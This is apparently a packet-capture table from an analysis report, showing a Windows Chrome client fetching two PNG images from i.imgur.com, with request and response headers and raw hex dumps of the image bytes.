2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: e9 af 37 3e 22 6c 01 c6 4e 01 12 e1 7d c1 60 70 7a 57 57 97 b4 70 95 0b 33 51 0d 96 02 49 8f 5e 65 e6 25 00 d6 15 8a 18 0c 06 df 41 44 ef c9 75 27 42 a1 2f c7 69 d9 aa a3 c1 91 75 b3 b2 1a 77 15 d2 e7 44 21 63 e3 34 b7 cd 4c af 95 93 97 3b 3d e3 63 11 10 91 f6 c5 5c 37 66 fc c1 b2 ac 79 a6 69 ce cb 3a 49 47 fc 75 5d bf 14 40 91 be 75 35 e0 fb 84 10 05 c7 d7 90 5d 08 a4 eb d2 ad 3a 1b 8a 4f b9 f2 a0 5b 35 3e 66 ea 22 c2 82 5c 0f 5d d7 bf 0a c0 51 a8 69 9a 2d cc f8 1b 51 7e 6b 61 60 60 cf fe eb d6 ad ab d7 65 68 4f c9 9d e9 0b ed ed ed 77 f4 f4 f4 f4 3a 45 d4 75 5d ba 70 89 d9 f9 98 6c 22 da 29 5f ce a4 1d 59 40 e3 09 32 47 cb b2 a4 f7 b5 55 06 fd 87 dc dd 72 f8 9c 8a e1 66 1d 00 ff a3 bc b4 ab 47 38 1c 5e ca 8c 59 b9 ee 44 98 0f 50 b4 78 0a 74 7e 47 47 c7 Data Ascii: 7>"lN}`pzWWp3QI^e%ADu'B/iuwD!c4L;=c\7fyi:IGu]@u5]:O[5>f"\]Qi-Q~ka``ehOw:Eu]pl")_Y@2GUrfG8^YDPxt~GG
2025-02-25 01:20:05 UTC	95	IN	Data Raw: 4b b7 97 77 74 74 cc 4c a5 52 3f c9 f7 e1 bc 01 38 19 42 88 87 4c d3 8c e4 0f 6c 51 c1 c1 59 66 7c 57 72 26 a0 54 63 2c 16 5d 66 9a 66 22 b7 ac 11 01 93 26 4d 3a 56 b6 79 0b 99 59 80 de 0a 3e af 51 69 14 e6 ff 02 00 00 ff ff 5a 98 a3 a9 0f 7b c2 43 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: KwttLR?8BLlQYf\|Wr&Tc,]ff"&M:VyY>QiZ{CIENDB`

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:05 UTC	553	OUT	GET /KAb5SEy.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:05 UTC	759	IN	HTTP/1.1 200 OK Connection: close Content-Length: 48869 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 13:35:05 GMT ETag: "8aa14660517f5460156fccc2199cf83c" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: ZMDtIIYNSizYrfDVWXb5ZuJtkSbNLszxoUAHUCL9zZz9IlMMufkJOg== cache-control: public, max-age=31536000 Accept-Ranges: bytes Age: 198478 Date: Tue, 25 Feb 2025 01:20:05 GMT X-Served-By: cache-iad-kjyo7100129-IAD, cache-ewr-kewr1740054-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 4, 0 X-Timer: S1740446405.300127,VS0,VE1 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 a7 00 00 02 3e 08 02 00 00 00 0e ee 34 d8 00 00 80 00 49 44 41 54 78 9c ec bd 77 7c 14 e5 da ff bf b3 b3 7d 37 3d 10 0c 3d 94 50 42 11 54 10 8f 22 d6 a3 1e 45 e4 b1 60 45 54 1e 11 45 ba 22 52 45 a4 89 05 eb 51 44 fd 3e 3e a8 14 c1 47 39 08 7a 10 14 50 94 5e 12 6a 28 21 04 48 48 48 d9 36 ed f7 3a 5c fe 6e c7 94 d9 cd 92 9d 6c 76 3f ef 3f 7c 6d 76 67 97 7b dc d9 f9 dc f7 75 5f 9f eb 32 29 8a 62 00 00 00 00 40 0c 60 ac ef 01 00 00 00 00 40 27 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 01 aa 0f 00 00 00 c4 0a 50 7d 00 00 00 20 56 80 ea 03 00 00 00 b1 02 54 1f 00 00 00 88 15 a0 fa 00 00 00 40 ac 00 d5 07 00 00 00 62 05 a8 3e 00 00 00 10 2b 40 f5 01 00 00 80 58 Data Ascii: PNGIHDR>4IDATxw\|}7==PBT"E`ETE"REQD>>G9zP^j(!HHH6:\nlv??\|mvg{u_2)b@`@'@b>+@XP} VT@b>+@X
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 95 de 05 00 00 20 34 f8 a9 53 a7 d6 f7 18 40 1d 50 a9 2c 2e 7b 92 64 d8 ef f7 7f f0 c1 07 6f bf fd f6 91 23 47 2e fe df a2 cf ac a9 05 1f 1d 40 35 79 68 f6 c0 f3 bc c5 62 a9 6d 96 80 d9 6c 16 45 f1 d4 a9 53 1e 8f 27 23 23 23 35 35 d5 68 34 92 2b e1 e2 4f 01 00 00 62 13 44 f8 1b 3c b4 94 67 02 4c 79 fb a4 8e 24 90 a2 28 2e 58 b0 60 ee dc b9 a7 4e 9d ba 98 7f a8 da 9d 7e b5 47 40 7d 24 2b d3 1b f2 05 46 19 00 b4 0b f0 d8 63 8f 8d 1f 3f 1e 8e 3e 00 00 b8 48 a0 fa 51 8e db ed 9e 33 67 ce 82 05 0b ce 9d 3b 47 4b f0 da c6 c9 d5 95 74 6b 82 2d fd 69 7b be ea 4b 3c cf 57 7a 3e 18 58 8e a1 cd 66 7b e0 81 07 46 8e 1c 99 95 95 55 db 0f 01 00 00 c0 40 84 3f 4a 10 04 81 a5 eb b3 75 7f 41 41 c1 dc b9 73 17 2c 58 50 52 52 62 32 99 ec 76 bb cf e7 ab ed 27 b3 d5 3c fd 49 Data Ascii: 4S@P,.{do#G.@5yhbmlES'###55h4+ObD<gLy$(.X`N~G@}$+Fc?>HQ3g;GKtk-i{K<Wz>Xf{FU@?JuAAs,XPRRb2v'<I
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 15 15 15 4c ec 03 a6 22 32 1f 3f 1d 4c 66 01 83 c1 30 7a f4 e8 f1 e3 c7 a7 a5 a5 85 6f c0 00 00 d0 a0 81 ea 47 1c 14 ee 0e 78 d8 a2 45 8b c6 8c 19 53 5c 5c 1c c2 3f c1 8a dd 5a ad 56 9f cf c7 71 5c db b6 6d 37 6e dc 18 17 17 67 b3 d9 2a 25 de 87 1b 51 14 1f 79 e4 91 ff fd df ff 25 39 3f 7f fe 7c b5 c2 1f 8c 8f df 6c 36 0f 1c 38 70 da b4 69 e4 33 84 9d 0f 00 00 2a 81 08 7f c4 11 8c dc 2e 5c b8 70 fa f4 e9 05 05 05 54 0a b7 b6 9f 4f 85 71 52 52 52 68 b9 7c e7 9d 77 fe f3 9f ff 6c d2 a4 09 49 be 7a 27 5e dd cb 27 4c 18 8d c6 56 ad 5a 71 1c 97 9d 9d 5d 5e 5e 6e b5 5a 5d 2e 97 db ed b6 58 2c ea 7f 9d 02 fb 26 93 a9 a6 3a 04 e4 e3 3f 79 f2 a4 ba 1f 3f 6b 4a 04 00 00 00 aa df 90 20 09 14 45 f1 bd f7 de 9b 3c 79 72 7e 7e be d9 6c 0e c1 94 4f da 69 b3 d9 4a 4b 4b Data Ascii: L"2?Lf0zoGxES\\?ZVq\m7ng%Qy%9?\|l68pi3.\pTOqRRRh\|wlIz'^'LVZq]^^nZ].X,&:?y?kJ E<yr~~lOiJKK
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: ab 55 c7 53 a9 4b a8 83 0e f9 f8 3d 1e cf d1 a3 47 7d 3e 1f 2d f4 59 25 c1 9a 36 f5 69 cb 9f 22 25 54 9e 48 14 45 af d7 0b 1f 3f 00 20 36 81 73 2f 52 c8 cb cb 9b 32 65 ca 47 1f 7d 44 5e 3b e1 02 06 83 21 2e 2e 4e 14 45 ed 7d 7d 52 7d 52 3e 2a 64 6b 36 9b 37 6e dc d8 b5 6b 57 1d cf 40 0f 3c 1e cf 8d 37 de b8 7d fb 76 b7 db cd f3 3c c9 79 40 1f bf c3 e1 50 14 85 fe 1f da 6c 36 56 d9 10 3e 7e 00 40 ac d1 90 12 bb 1a 28 1a cb 50 b6 7c cf ce ce 1e 39 72 e4 a2 45 8b e8 4f b7 db cd 5e 2a 2b 2b 23 b9 aa 94 9f cf 48 48 48 20 f7 5a 7c 7c 3c 6d ed f7 ee dd fb b7 df 7e 8b 3e c9 a7 3a 45 1b 36 6c e8 df bf 3f ed 59 24 24 24 50 be 82 c5 62 a9 94 a5 68 34 1a d9 8e 86 db ed 66 d3 26 af d7 cb be 91 05 0b 16 8c 1e 3d fa d0 a1 43 f4 67 08 e5 8d 01 00 a0 61 81 08 7f d8 d1 b0 Data Ascii: USK=G}>-Y%6i"%THE? 6s/R2eG}D^;!..NE}}R}R>dk67nkW@<7}v<y@Pl6V>~@(P\|9rEO^++#HHH Z\|\|<m~>:E6l?Y$$$Pbh4f&=Cga
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: de 7d fb f6 29 8a 02 1f 3f 00 a0 a1 03 bf 7e 18 f9 f5 d7 5f 6f bf fd f6 b3 67 cf 5a 2c 16 5a af d3 da 5d 92 24 9b cd a6 b1 bb cf 1c e7 f4 20 21 21 a1 57 af 5e 2b 57 ae b4 d9 6c fa 9e 41 83 27 64 1f bf 24 49 34 45 a3 5a fd 34 f7 1a 37 6e dc d8 b1 63 d5 7b fc 55 d3 36 01 00 20 92 81 25 a9 8e 61 8b f8 8d 1b 37 0e 1b 36 ec ec d9 b3 a4 3d 34 bb 12 45 91 84 87 49 3e 2b a7 4f e9 7b 1c c7 31 3b 7e 42 42 02 3d b8 f3 ce 3b 21 f9 a1 51 93 8f 9f 59 f6 09 da 55 61 fa 5d 5e 5e ce ea 28 78 3c 1e f6 9d be f6 da 6b 23 47 8e 3c 72 e4 08 fd 29 08 02 24 1f 00 d0 b0 40 84 bf 2e 51 14 85 dc f6 bb 76 ed 9a 31 63 c6 fa f5 eb 2d 16 8b 76 8d 17 16 6b 61 f6 3c 2a ba 27 cb b2 c7 e3 31 9b cd 4f 3e f9 e4 c8 91 23 11 58 0e 19 f2 f1 cb b2 bc 77 ef 5e b7 db 6d b7 db 5d 2e 97 db ed 66 33 Data Ascii: })?~_ogZ,Z]$ !!W^+WlA'd$I4EZ47nc{U6 %a76=4EI>+O{1;~BB=;!QYUa]^^(x<k#G<r)$@.Qv1c-vka<*'1O>#Xw^m].f3
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 7e f8 e1 a1 87 1e ca cb cb a3 4b ba ac ac 4c 96 65 9e e7 99 c3 48 92 24 9f cf 47 9e 94 a2 a2 a2 23 47 8e dc 73 cf 3d f5 3d 70 10 5e a0 fa a1 40 92 ff eb af bf 4e 99 32 e5 f0 e1 c3 d4 2f a7 b6 6e 08 12 92 c7 1e 7b 6c c6 8c 19 b4 59 00 c9 d7 19 b5 8f bf 7b f7 ee 65 65 65 db b7 6f af ad 8f df 64 32 09 82 a0 f6 f1 53 3f 7e f8 f8 41 fd b2 7c f9 f2 91 23 47 16 14 14 50 6b 69 ba e1 a8 a7 b0 74 db 61 7d a4 14 45 39 78 f0 e0 ed b7 df de a4 49 93 7a 1d 38 08 2f 50 fd 5a 43 e1 fd a2 a2 a2 59 b3 66 ad 5e bd 3a 98 ce ad d5 62 b1 58 ee bd f7 de 09 13 26 20 1a 5c bf d0 8e 7e 72 72 72 68 3e 7e 93 c9 44 0d 96 d4 3e fe 9c 9c 1c ea c7 0f 1f 3f d0 1f bf df bf 6c d9 b2 b9 73 e7 ee dd bb 97 d5 0e b1 58 2c 0e 87 83 1e 3b 9d 4e 8a 35 92 9f 85 2e 60 45 51 44 51 6c d4 a8 51 bf 7e Data Ascii: ~KLeH$G#Gs==p^@N2/n{lY{eeeod2S?~A\|#GPkita}E9xIz8/PZCYf^:bX& \~rrrh>~D>?lsX,;N5.`EQDQlQ~
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: 6a fd e6 9b 6f d8 ce 3d 68 88 f8 fd 7e 56 a2 3c 21 21 81 1e b0 0a 3f 44 25 1f bf 06 c3 86 0d a3 8f ad a8 a8 a8 ef 33 03 0d 92 a5 4b 97 a6 a7 a7 53 05 1e 8d 2b 8d 5d a2 64 3d 65 8f 0d 06 43 62 62 22 bd da ae 5d bb e5 cb 97 d7 f7 09 01 9d 40 84 3f 00 54 63 67 e5 ca 95 9f 7f fe 39 f9 f4 6a 82 b5 cd 65 6d 2d 98 cb 6b e4 c8 91 0f 3f fc b0 d5 6a 85 71 ab e1 c2 f3 7c cb 96 2d 65 59 56 f7 e3 77 bb dd b5 ed c7 4f 1c 3b 76 4c 92 a4 bf fd ed 6f b4 4f 84 fd 1d 50 2b 96 2e 5d 3a 6d da b4 c3 87 0f 07 ac f3 a1 76 99 b2 c7 1c c7 c5 c7 c7 9f 3f 7f 5e 96 e5 ac ac ac d1 a3 47 df 7d f7 dd b8 08 63 85 fa 9e 76 44 34 1e 8f 47 51 94 bc bc bc 9b 6f be 99 fe 77 69 af f5 69 e2 4c 3d 57 d8 cc ba 53 a7 4e c7 8e 1d ab ef 53 01 75 c3 a1 43 87 fe eb bf fe 8b be 6e 5a 63 31 81 57 5f 1b Data Ascii: jo=h~V<!!?D%3KS+]d=eCbb"]@?Tcg9jem-k?jq\|-eYVwO;vLoOP+.]:mv?^G}cvD4GQowiiL=WSNSuCnZc1W_
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: be 42 20 a1 3a 36 81 2f 1f 84 15 a8 fe 5f a0 9b f5 d9 b3 67 3f f9 e4 13 ba e7 32 87 2b 9b 44 6b 7f c2 ed b7 df 7e fd f5 d7 ab df 08 a2 1e ea 9a 68 30 18 2e bd f4 d2 71 e3 c6 5d 77 dd 75 21 7c 88 d9 6c ce cb cb 5b b7 6e 5d 18 06 08 1a 12 a1 f5 cb 57 d7 d8 67 21 81 b4 b4 b4 99 33 67 3e f8 e0 83 f4 a7 28 8a 54 6d 0c 61 a4 58 06 aa ff 17 28 b8 fa d5 57 5f 9d 3c 79 92 04 5e dd 4f 5d bb 59 b5 28 8a 8d 1a 35 7a f0 c1 07 69 4a ae ee a3 0f a2 1b 8e e3 58 06 f5 35 d7 5c f3 d0 43 0f a5 a4 a4 d4 f6 43 28 ee fa d5 57 5f 51 55 47 10 83 c0 97 0f 74 00 aa ff 27 14 d2 17 45 71 e5 ca 95 ec c7 43 6d 2a 58 b1 55 ed 39 72 87 0e 1d ae bd f6 5a 0a a3 e9 38 70 50 9f b0 4b 42 10 04 7a 7c d7 5d 77 3d fc f0 c3 b5 fd 1c 59 96 39 8e db b0 61 03 25 6c 83 18 04 be 7c a0 03 50 fd 3f a1 Data Ascii: B :6/_g?2+Dk~h0.q]wu!\|l[n]Wg!3g>(TmaX(W_<y^O]Y(5ziJX5\CC(W_QUGt'EqCm*XU9rZ8pPKBz\|]w=Y9a%l\|P?
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: d0 a0 81 03 07 d2 f3 f0 e5 83 d0 80 ea 1b 28 81 bf 56 de 2a fa 8d 25 24 24 b4 6d db 56 97 01 82 86 8a cf e7 a3 1b 7d 90 f7 65 3a 8c f6 71 c3 3f 3a 10 5e c8 97 bf 7f ff fe b8 b8 38 ca c2 a3 1a ba e4 cb b7 5a ad 54 e6 ab 26 e8 56 c3 56 f9 83 06 0d 1a 3e 7c 38 7b 95 f9 f2 65 59 46 f3 5c 10 3c b8 b3 18 dc 6e 37 f5 d9 a3 1b 6e c0 58 19 a5 ee 1b 0c 86 e1 c3 87 23 b0 06 b4 d9 bb 77 2f b3 60 49 92 a4 a1 e5 14 ec 95 24 89 dc 59 8d 1b 37 d6 77 a4 a1 a0 2d 5a 31 0e f5 cb df bf 7f bf c3 e1 20 c9 af b6 5f 3e 05 17 ab 9d ea c5 c5 c5 91 ea b7 6f df fe bd f7 de 53 4b 3e 03 fd f2 41 6d c1 5a df 70 e8 d0 21 8a b6 a9 db ea 68 37 e0 a1 fb 78 46 46 06 02 6b 40 9b 9c 9c 1c 75 8a b5 46 e5 47 36 83 54 14 25 35 35 55 c7 31 d6 1a 3a 05 ab d5 4a b9 e8 f9 f9 f9 a7 4f 9f 3e 7e fc b8 Data Ascii: (V*%$$mV}e:q?:^8ZT&VV>\|8{eYF\<n7nX#w/`I$Y7w-Z1 _>oSK>AmZp!h7xFFk@uFG6T%55U1:JO>~
2025-02-25 01:20:05 UTC	1371	IN	Data Raw: fa 6a ba ef 87 61 74 b5 a3 ea 52 9e 54 9f e7 79 a3 d1 58 ab 8e c0 91 70 3a 75 88 20 08 6b d7 ae 7d e6 99 67 76 ef de 5d c9 97 af fd 46 b5 2f 9f 24 5f 51 94 aa be 7c 48 3e 08 2b 31 ad fa 05 05 05 da 5b 71 d5 92 96 96 96 98 98 18 9e 11 81 06 cc f6 ed db 47 8d 1a f5 d3 4f 3f 71 1c 17 da ea f6 96 5b 6e c9 cc cc 0c c3 d0 ea 0c 2a bb 4b 45 87 aa 0d 59 57 4b 30 db ff 0d 08 f8 f2 41 83 26 a6 27 95 05 05 05 21 dc 8f d0 5d 17 54 65 d7 ae 5d 2f bf fc f2 f7 df 7f 4f 2d 98 43 88 21 b5 6e dd fa 9e 7b ee 21 d9 88 cc d5 5e a5 08 7f 90 92 1f 4d 84 a3 5f fe 5d 77 dd 45 cf c3 97 0f f4 21 76 af 2d 49 92 42 b8 35 1b 0c 86 66 cd 9a 85 61 38 a0 01 93 97 97 37 65 ca 94 65 cb 96 51 f0 b6 a4 a4 24 84 e2 f3 dd ba 75 23 47 a8 76 ad fe fa 85 75 ac a8 94 8b ae 31 4d 89 26 cf 1e 7c f9 Data Ascii: jatRTyXp:u k}gv]F/$_Q\|H>+1[qGO?q[n*KEYWK0A&'!]Te]/O-C!n{!^M_]wE!v-IB5fa87eeQ$u#Gvu1M&\|

Timestamp	Bytes transferred	Direction	Data
2025-02-25 01:20:06 UTC	352	OUT	GET /0HdPsKK.png HTTP/1.1 Host: i.imgur.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-02-25 01:20:06 UTC	758	IN	HTTP/1.1 200 OK Connection: close Content-Length: 5579 Content-Type: image/png Last-Modified: Thu, 20 Feb 2025 02:14:56 GMT ETag: "28a8812c3aaf8af83ba5c83c58750528" x-amz-server-side-encryption: AES256 X-Amz-Cf-Pop: IAD89-P1 X-Amz-Cf-Id: YYTlmwzZRLqXoGXppDaHC3Gtdw92u8SHfCwF9eVUy31VA6g75HGzNw== cache-control: public, max-age=31536000 Accept-Ranges: bytes Date: Tue, 25 Feb 2025 01:20:06 GMT Age: 149463 X-Served-By: cache-iad-kcgs7200129-IAD, cache-ewr-kewr1740074-EWR X-Cache: Miss from cloudfront, HIT, HIT X-Cache-Hits: 3, 1 X-Timer: S1740446406.318179,VS0,VE4 Strict-Transport-Security: max-age=300 Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Origin: * Server: cat factory 1.0 X-Content-Type-Options: nosniff
2025-02-25 01:20:06 UTC	1371	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 00 55 08 06 00 00 00 a6 46 3a 96 00 00 15 92 49 44 41 54 78 9c ec 9d 0b 94 5b 55 bd ff bf bf 73 92 4c 87 4e 0b 14 da 22 85 ce b4 50 40 d4 5a 44 84 76 48 ce 49 67 0a 88 2f a4 88 8a 02 ca fa 03 fe 51 c1 85 02 2e 04 9a b2 00 29 78 e1 e2 c5 07 57 91 87 d6 8b 08 f5 a2 82 80 b4 d9 c9 cc 14 aa 94 87 0f b4 0a a5 14 4a 6b a9 d4 76 66 3a d3 49 72 7e 77 9d 24 33 ce 24 fb 24 27 cf 33 e9 ec cf 5a b3 26 d9 cf ef 49 b2 7f fb bd b7 0f 0a c5 04 a1 ef c6 39 33 91 e4 d3 99 71 1a 33 e6 10 61 0a c0 53 19 98 4a a0 96 7f 87 e4 1d 0c fc 8e 40 bf d7 60 3d 9b 0a a4 9e 9e 7a f5 96 7f 7a a9 bd 56 90 d7 02 14 8a 5a 32 70 c3 9c d6 64 d2 ba 08 a0 0f 01 78 6f 05 49 fd 01 b0 1e 06 f0 d0 94 c8 e6 97 aa 28 d1 53 94 01 50 ec Data Ascii: PNGIHDRUF:IDATx[UsLN"P@ZDvHIg/Q.)xWJkvf:Ir~w$3$$'3Z&I93q3aSJ@`=zzVZ2pdxoI(SP
2025-02-25 01:20:06 UTC	1371	IN	Data Raw: 34 f9 e0 31 ce b4 df 3b 6a 97 27 e1 a4 a1 ff 35 22 40 ec ba e2 41 15 0a 17 ec 5e d6 7a 35 11 be 61 ff 74 bd d6 d2 28 d0 7e 07 a2 f9 bc 95 d0 66 4a 06 e8 53 7b 91 78 ec 4c 20 59 bb 9b c3 fc 9c 3c 82 96 76 6f 2c 14 46 b5 00 14 05 e9 bd be cd 80 85 fb 01 cc f6 5a 4b 23 a1 1d 7c 04 9a 3f 7b 1f 68 ff 59 f2 00 7a 13 f4 a3 3e 8d d4 4b 77 d7 4c c3 10 e9 37 03 38 bb 50 18 35 08 a8 70 a4 2f d2 7a 0e 2c 7e 4a 15 fe d2 f0 7f e0 3c ec 77 f1 a3 ce 85 3f 0b cd fb 24 68 c6 09 35 d3 41 8c a5 fc ab c5 05 45 28 03 a0 90 b2 3b d2 b6 82 41 2b 01 52 ad 44 17 50 cb 74 f8 17 5d 84 c9 5f 5e 83 a6 0f 2e 07 7c 4d c5 e3 68 7e f8 da 6f 81 36 e7 63 35 12 45 5a 22 91 ba bc 60 90 da e4 ac 68 64 fa 96 b7 5d c6 8c ff f4 5a 47 4d b0 0b a6 a6 03 a4 a7 2f 1a a2 e1 d7 9a 96 fd 6f bf d7 d2 ff Data Ascii: 41;j'5"@A^z5at(~fJS{xL Y<vo,FZK#\|?{hYz>KwL78P5p/z,~J<w?$h5AE(;A+RDPt]_^.\|Mh~o6c5EZ"`hd]ZGM/o
2025-02-25 01:20:06 UTC	1371	IN	Data Raw: fa a6 69 7e 4b 08 51 93 93 32 42 a1 d0 22 22 ac c8 3d fc 9a 08 f6 e7 54 b6 01 20 c2 25 00 bd ab 48 98 31 0d 6c c3 30 77 12 e1 16 21 c4 cd 2e b3 69 a9 e4 fb 20 42 3f 80 3c 03 60 18 e1 eb 00 1c d1 dc dc bc 33 1c 0e ff 66 4c 17 20 14 0a cd 63 a6 f5 44 da 2d 00 1d 50 3c 13 5a a2 69 78 c4 34 cd 7b ca 15 5a 6d 4c d3 bc 9d 48 8b 3b 15 fe b1 d0 c1 00 dd 69 9a e1 67 82 c1 60 0d 2f 6c af 17 e9 e7 f9 8c a6 f1 6a c3 30 9f ec e8 e8 70 bc 12 6a 22 a0 69 da 97 e5 3e 74 b0 69 9a e7 d7 53 0b 11 1d 08 d0 37 0d 23 1c eb ec ec dc bf 9e 79 0f 63 18 c6 12 66 7a 06 e0 29 cc 34 c3 6e dd 8f 18 80 70 38 7c 3c 91 b6 9e 08 c7 96 9e 34 7d ce 30 c2 45 b7 3e 31 53 4d ef 21 30 4d f3 71 80 be 52 46 d4 13 75 5d 7f 6e f1 e2 c5 ad c5 02 32 b3 f4 19 9c dc 8b f9 d5 0a db 38 a7 52 a9 67 3b 3a Data Ascii: i~KQ2B""=T %H1l0w!.i B?<`3fL cD-P<Zix4{ZmLH;ig`/lj0pj"i>tiS7#ycfz)4np8\|<4}0E>1SM!0MqRFu]n28Rg;:
